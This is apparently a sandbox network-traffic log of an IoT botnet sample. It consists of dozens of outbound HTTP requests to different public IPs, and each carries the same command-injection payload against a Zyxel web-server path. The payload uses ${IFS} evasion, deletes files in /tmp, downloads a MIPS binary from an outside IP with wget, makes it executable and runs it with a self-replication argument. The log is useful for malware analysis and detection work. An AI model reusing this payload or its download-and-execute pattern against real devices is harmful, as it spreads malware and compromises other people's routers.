                                                Jan 12, 2024 18:16:42.916517973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9344192.168.2.2356480174.0.173.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916604042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9345192.168.2.2357304153.134.192.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916604042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9346192.168.2.2336142198.16.54.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916625023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9347192.168.2.2347948175.98.36.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916682959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9348192.168.2.2357344140.44.206.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916723013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9349192.168.2.2359672141.98.56.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916733027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9350192.168.2.235893634.103.168.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916785002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9351192.168.2.2354126221.234.119.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916819096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9352192.168.2.2347418198.208.249.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916855097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9353192.168.2.2351506106.126.19.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916896105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9354192.168.2.233678074.165.209.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916932106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9355192.168.2.2357888220.13.9.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916950941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9356192.168.2.233564240.185.184.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.916973114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9357192.168.2.2342144179.150.54.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917026043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9358192.168.2.235183476.178.247.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917087078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9359192.168.2.2338958198.215.29.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917114973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9360192.168.2.2336930113.130.101.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917150974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9361192.168.2.235132248.41.0.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917181015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9362192.168.2.2334170112.71.246.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917237997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9363192.168.2.2347986185.237.4.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917289972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9364192.168.2.233523037.1.17.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917316914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9365192.168.2.236029661.233.57.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917361975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9366192.168.2.2338744168.229.203.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917401075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9367192.168.2.2339406166.116.48.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917423010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9368192.168.2.233684020.219.3.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917469978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9369192.168.2.2357582204.60.153.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917517900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9370192.168.2.2337074185.97.164.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917556047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9371192.168.2.2344844200.206.229.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917573929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9372192.168.2.2339026195.96.35.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917618990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9373192.168.2.235945272.161.162.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917634964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9374192.168.2.2352114195.239.28.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917689085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9375192.168.2.233609687.247.66.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917714119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9376192.168.2.2336444206.149.249.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917757034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9377192.168.2.23466828.16.227.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917814970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9378192.168.2.235297018.247.126.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917814970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9379192.168.2.2342306118.224.115.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917848110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9380192.168.2.234837250.143.33.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917908907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9381192.168.2.2357910165.239.117.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917929888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9382192.168.2.2358790196.145.161.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.917980909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9383192.168.2.234400460.208.116.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918001890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9384192.168.2.234845286.142.174.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918061018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9385192.168.2.2352124217.163.205.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918093920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9386192.168.2.235596497.0.166.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918118000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9387192.168.2.23528025.247.114.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918148041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9388192.168.2.2360874157.143.158.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918189049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9389192.168.2.2341038141.252.171.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918236017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9390192.168.2.2355454145.12.240.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918281078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9391192.168.2.2358820116.131.170.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918298006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9392192.168.2.2352492198.188.130.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918339014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9393192.168.2.233324683.164.175.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918370008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9394192.168.2.2352166122.236.88.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918440104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9395192.168.2.235208857.81.82.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918463945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9396192.168.2.2337630126.176.20.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918504000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9397192.168.2.2341042129.103.167.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918525934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9398192.168.2.235333013.25.81.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918567896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9399192.168.2.235939093.161.32.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918626070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9400192.168.2.2335218195.70.44.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918626070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9401192.168.2.234317070.213.67.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918692112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9402192.168.2.2360828109.93.14.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918709040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9403192.168.2.235096036.179.33.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918740988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9404192.168.2.2355690109.1.97.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918750048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9405192.168.2.2340856139.29.209.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:42.918780088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9406192.168.2.2334184190.144.94.182443
                                                TimestampBytes transferredDirectionData
